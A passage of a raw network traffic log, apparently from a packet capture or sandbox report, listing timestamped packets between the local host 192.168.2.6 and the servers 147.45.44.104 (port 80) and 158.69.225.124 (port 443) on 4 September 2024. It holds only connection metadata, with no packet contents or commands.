Sep 4, 2024 17:37:10.598947048 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.598965883 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.599152088 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599160910 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599165916 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599178076 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599188089 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599247932 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.599271059 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599271059 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.599283934 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599292994 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599303007 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599312067 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599323034 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599328995 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.599333048 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599335909 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.599345922 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599354029 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.599356890 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599368095 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599374056 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.599380970 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599390984 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.599415064 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.599575043 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599585056 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599592924 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599603891 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599612951 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599623919 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599626064 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.599634886 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599634886 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.599646091 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599656105 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599658012 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.599677086 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.599685907 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.599714994 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599725008 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599750996 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.599800110 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599811077 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599819899 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599829912 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599838018 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.599839926 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.599864960 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.599878073 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.602647066 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.602663994 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.602745056 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.602754116 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.602925062 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.602945089 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.603009939 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.603017092 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.603288889 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.603303909 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.603347063 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.603358984 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.604227066 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.604247093 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.604279995 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.604285955 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.604298115 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.604330063 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.604610920 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.604629993 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.604671955 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.604680061 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.604876041 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.604893923 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.604921103 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.604928970 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.604948044 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.604973078 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.605180979 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.605195999 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.605228901 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.605235100 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.605254889 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.605279922 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.605488062 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.605528116 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.605544090 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.605549097 CEST	443	49727	158.69.225.124	192.168.2.6
Sep 4, 2024 17:37:10.605562925 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.605585098 CEST	49727	443	192.168.2.6	158.69.225.124
Sep 4, 2024 17:37:10.635385990 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.635479927 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.635488033 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.635493040 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.635503054 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.635510921 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.635520935 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.635586977 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.635617018 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.635627031 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.635632992 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.635647058 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.635670900 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.635796070 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.635808945 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.635817051 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.635847092 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.635862112 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.635947943 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.635957956 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.635967016 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.635977983 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.635986090 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.635987043 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.635996103 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.636006117 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.636009932 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.636015892 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.636030912 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.636051893 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.636094093 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.636106014 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.636112928 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.636122942 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.636132002 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.636132002 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.636142969 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.636142969 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.636168003 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.636193991 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.636228085 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.636236906 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.636271954 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.636385918 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.636396885 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.636404991 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.636415958 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.636424065 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.636428118 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.636435032 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.636436939 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.636447906 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.636456966 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.636492968 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.636671066 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.636682034 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.636692047 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.636702061 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.636712074 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.636713982 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.636723995 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.636748075 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.636806965 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.636816025 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.636822939 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.636845112 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.636862040 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.636991978 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637001991 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637011051 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637022018 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637023926 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.637032986 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.637041092 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.637059927 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.637129068 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637139082 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637146950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637152910 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637162924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637171030 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.637176991 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637187958 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637188911 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.637198925 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637208939 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637217999 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637219906 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.637232065 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637233973 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.637247086 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.637248993 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637265921 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637265921 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.637299061 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.637455940 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637469053 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637495995 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.637507915 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.637602091 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637613058 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637638092 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.637650013 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.637684107 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637696028 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637705088 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637713909 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637721062 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.637726068 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637728930 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.637736082 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.637749910 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.637761116 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.637855053 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637866974 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637875080 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637887001 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637892008 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637897015 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.637902975 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.637914896 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.637927055 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.637947083 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.638151884 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.638161898 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.638170958 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.638179064 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.638190031 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.638195038 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.638211966 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.638231039 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.638308048 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.638320923 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.638329029 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.638339996 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.638339996 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.638350010 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.638351917 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.638361931 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.638366938 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.638374090 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.638381958 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.638403893 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.638417959 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.638444901 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.638456106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.638463974 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.638472080 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.638474941 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.638493061 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.638499975 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.638513088 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.638803005 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.638813972 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.638823032 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.638833046 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.638837099 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.638853073 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.638878107 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.638993979 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.639005899 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.639014959 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.639030933 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.639038086 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.639041901 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.639053106 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.639055967 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.639064074 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.639074087 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.639080048 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.639085054 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.639095068 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.639101028 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.639105082 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.639115095 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.639118910 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.639125109 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.639136076 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.639170885 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.639188051 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.639339924 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.639370918 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.639506102 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.639516115 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.639524937 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.639534950 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.639539003 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.639544010 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.639545918 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.639565945 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.639585972 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.639698029 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.639714003 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.639723063 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.639734030 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.639738083 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.639744997 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.639746904 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.639753103 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.639770985 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.639781952 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.639878988 CEST	80	49719	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.642107010 CEST	49719	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.684041977 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.684055090 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.684067011 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.684101105 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.684119940 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.684178114 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.684191942 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.684201956 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.684227943 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.684247017 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.684329987 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.684489965 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.684499979 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.684509039 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.684518099 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.684520960 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.684529066 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.684534073 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.684540987 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.684550047 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.684550047 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.684575081 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.684590101 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.684766054 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.684776068 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.684802055 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.684813976 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.684906960 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.684919119 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.684926987 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.684951067 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.684968948 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.685050964 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.685062885 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.685071945 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.685080051 CEST	80	49717	147.45.44.104	192.168.2.6
Sep 4, 2024 17:37:10.685091972 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.685112000 CEST	49717	80	192.168.2.6	147.45.44.104
Sep 4, 2024 17:37:10.685205936 CEST	80	49717	147.45.44.104	192.168.2.6
